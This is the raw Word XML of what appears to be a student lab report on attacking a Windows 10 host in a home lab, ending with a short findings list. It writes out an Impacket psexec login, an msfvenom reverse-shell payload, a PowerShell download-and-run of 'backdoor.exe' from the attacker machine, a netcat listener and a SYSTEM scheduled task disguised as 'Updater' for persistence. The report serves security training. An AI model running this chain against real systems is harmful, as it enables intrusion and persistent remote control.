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1A492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354D26D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8B29591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1B3C60D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56DEC31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CDA8258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474B99A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1BD8E1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F8BC4C0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FEB941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6C4C2F3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Lateral Movement </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780AB54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645C8FE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53F5C1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9A8753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9B7313A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2BF8F5F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56AEF55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05AC362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8E72BE8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C9D8D62">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6565B011">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23E8F11A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D1FAB0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Table of contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7440ABC4">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:tabs>
          <w:tab w:val="righ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_Toc32021 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lab Objective</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc32021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BC14578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_Toc19034 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:bCs/>
          <w:szCs w:val="32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Environment &amp; Tools</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc19034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A57C384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_Toc26592 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Attack Phases</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc26592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8559BDE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_Toc30394 </w:instrText>
      </w:r>
      <w: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3.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc30394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D1DDA47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_Toc28060 </w:instrText>
      </w:r>
      <w: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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Exploitation – Remote Code Execution</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc28060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B308DED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_Toc20884 </w:instrText>
      </w:r>
      <w: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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Payload Creation</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc20884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B9388FE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_Toc29436 </w:instrText>
      </w:r>
      <w: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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Command &amp; Control – Reverse Shell</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc29436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69B5F66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_Toc28997 </w:instrText>
      </w:r>
      <w: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Cs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Persistence</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc28997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DD49F84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_Toc12186 </w:instrText>
      </w:r>
      <w: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Cs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Findings</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc12186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B75FDFE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_Toc26367 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc26367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E5A20E9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_Toc20436 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc20436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0000016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fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>List of Figures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388E899B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\t "Heading 4" \h \c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_Toc24851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removing filters and firewalls and checking for open shares</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc24851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22F075E2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_Toc4491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2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account membership details</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc4491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34E240D3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_Toc2773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impacket psexec getting successfully executed</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc2773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5A7C83E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_Toc28177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4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payload creation and starting a server at 8080</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc28177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4CD4E39F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_Toc18815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connecting to server at 8080 and executing payload in windows</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc18815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1E2BBF9F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_Toc4222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6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net-cat getting connected and scheduled tasks for persistence</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc4222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0000018">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="317B4DFA"/>
    <w:p w14:paraId="2A619699"/>
    <w:p w14:paraId="7B163DB9"/>
    <w:p w14:paraId="447BE602"/>
    <w:p w14:paraId="5A651A2B"/>
    <w:p w14:paraId="62E579DA"/>
    <w:p w14:paraId="6686E2E3"/>
    <w:p w14:paraId="5D1FDD90">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47DC1BBC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31C20B87">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3754376E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0" w:name="_Toc32021"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lab Objective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="1C2C9F93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The objective of this engagement was to simulate an attacker’s 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>work-flow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against a Windows 10 host in order to identify security weaknesses, achieve remote access, and establish persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F77286A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 w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc19034"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Environment &amp; Tools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="531716E6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Attacker Machine:</w:t>
      </w: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 xml:space="preserve"> Kali Linux (IP: 192.168.1.43)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B115C0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Target Machine: </w:t>
      </w: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Windows 10 (IP: 192.168.1.53)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CED6C4"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  <w:t>Tools Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703E362E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Impacket (psexec.py, wmiexec.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADCE03B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msfvenom (payload creation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF9CE7F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nc (Netcat, reverse shell listener)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DABFA08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Windows native commands (schtasks, net user, sc query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A325AFC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 w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc26592"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Attack Phases</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="53DF7E21">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc30394"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="5ED617AC">
      <w:pPr>
        <w:ind w:left="72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 xml:space="preserve">Step 1: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Identified target IP</w:t>
      </w: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 xml:space="preserve"> (192.168.1.53).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A9D1B0">
      <w:p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2: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Made sure that antivirus software,and real time monitoring is turned off and v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alidated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open SMB services and administrative shares (C$, ADMIN$)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1116740B">
      <w:pPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default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29605" cy="1836420"/>
            <wp:effectExtent l="0" t="0" r="635" b="7620"/>
            <wp:docPr id="7" name="Picture 7" descr="allow acces i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llow acces in window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3AA">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0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4" w:name="_Toc24851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removing filters and firewalls and checking for open shares</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="440BEBCD">
      <w:pPr>
        <w:ind w:left="720" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35CEC92B">
      <w:pPr>
        <w:ind w:left="720" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="431C9857">
      <w:pPr>
        <w:ind w:left="720" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C91A5B">
      <w:pPr>
        <w:ind w:left="720" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F4A316">
      <w:pPr>
        <w:ind w:left="720" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="563B1444">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="610B75FA">
      <w:p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3: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Verified account membership in local Administrators group (windows user).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254A0679"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26430" cy="2899410"/>
            <wp:effectExtent l="0" t="0" r="3810" b="11430"/>
            <wp:docPr id="2" name="Picture 2" descr="prerequi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erequisit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496B">
      <w:pPr>
        <w:pStyle w:val="5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bookmarkStart w:id="5" w:name="_Toc4491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account membership details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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  <w:bookmarkStart w:id="17" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="7ED58662">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc28060"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Exploitation – Remote Code Execution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="5289D43A">
      <w:p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 xml:space="preserve">Step 1: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Used Impacket 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>Psexec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for remote code execution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and successfully gained access to SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FE34C1">
      <w:pPr>
        <w:ind w:left="144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python3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:i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/usr/share/doc/python3-impacket/examples/psexec.py Windows:windows@192.168.1.53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078A8EA1"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25795" cy="2002790"/>
            <wp:effectExtent l="0" t="0" r="4445" b="8890"/>
            <wp:docPr id="10" name="Picture 10" descr="move laterally i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ove laterally in window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E2A3">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0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7" w:name="_Toc2773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impacket psexec getting successfully executed</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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0D70D9B6"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 w14:paraId="0F2E1AD0"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 w14:paraId="20D02B47"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 w14:paraId="4ADBB2C4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc20884"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Payload Creation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="61DD4DA9">
      <w:p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1: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Created a Windows reverse shell binary using msfvenom:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7259D4D6">
      <w:pPr>
        <w:ind w:left="144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msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.43 LPORT=4444 -f exe -o backdoor.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798F4C15">
      <w:p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2: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Start a server at port 8080 where backdoor.exe was downloaded on kali machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0787CCA2"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28970" cy="1035050"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1270"/>
            <wp:docPr id="11" name="Picture 11" descr="create msf back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reate msf backdoo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9AC0"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21985" cy="1178560"/>
            <wp:effectExtent l="0" t="0" r="8255" b="10160"/>
            <wp:docPr id="12" name="Picture 12" descr="find where bacdoor was installed and start a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ind where bacdoor was installed and start a serv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DE51">
      <w:pPr>
        <w:pStyle w:val="5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bookmarkStart w:id="9" w:name="_Toc28177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payload creation and starting a server at 8080</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="605694A2">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc29436"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Command &amp; Control – Reverse Shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="44631BB7">
      <w:p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1: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First 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pened listener on attacker machine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before executing the backdoor.exe on target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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDCA1FE">
      <w:pPr>
        <w:ind w:left="144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nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5C9499">
      <w:p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 xml:space="preserve">Step 2: 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>Next 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ploaded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and executed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backdoor.exe to target (C:\Users\Public\)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using PowerShell command from the impacket RCE terminal, resulting in a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71268DE6">
      <w:pPr>
        <w:ind w:left="1440" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs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Powershell “Invoke-WebRequest -Uri ‘http://192.168.1.43:8080/backdoor.exe’ -OutFile ‘C:\Users\Public\backdoor.exe’ “</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C79858">
      <w:pPr>
        <w:ind w:left="1440" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs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C:\Users\Public\backdoor.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5651BE"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25160" cy="2320925"/>
            <wp:effectExtent l="0" t="0" r="5080" b="10795"/>
            <wp:docPr id="15" name="Picture 15" descr="use impacter to connect with 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use impacter to connect with n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7D1C">
      <w:pPr>
        <w:pStyle w:val="5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bookmarkStart w:id="11" w:name="_Toc18815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connecting to server at 8080 and executing payload in windows</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="77FBDBDD">
      <w:p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3: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Once executed we see a connection being made in our nc , now we move to persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483CB950">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val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bookmarkStart w:id="12" w:name="_Toc28997"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Persistence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="0DA0F589"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1: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Initial attempt with schtasks /create /sc daily failed due to SID mapping error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198834FA"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2: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Fixed by creating persistence task as SYSTEM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159D708D">
      <w:pPr>
        <w:ind w:left="1440" w:left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schtasks /create /sc onstart /tn "Updater" /tr "C:\Users\Public\backdoor.exe" /ru SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AFEABC">
      <w:p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3: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Verified with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630B6974">
      <w:pPr>
        <w:ind w:left="144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schtasks /query /tn "Updater"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAAC779">
      <w:p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4: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Persistence allows execution of the payload every system reboot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790A8886"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32145" cy="2334895"/>
            <wp:effectExtent l="0" t="0" r="13335" b="12065"/>
            <wp:docPr id="13" name="Picture 13" descr="nc gets connected and payload starts running ! our task is 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nc gets connected and payload starts running ! our task is do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F225">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0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13" w:name="_Toc4222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net-cat getting connected and scheduled tasks for persistence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="012B83AC"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 w14:paraId="71D3D96B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bookmarkStart w:id="14" w:name="_Toc12186"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="56840E43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SMB shares writable by attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C7F58F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Local user windows has Administrator privileges.</w:t>
      </w:r>
    </w:p>
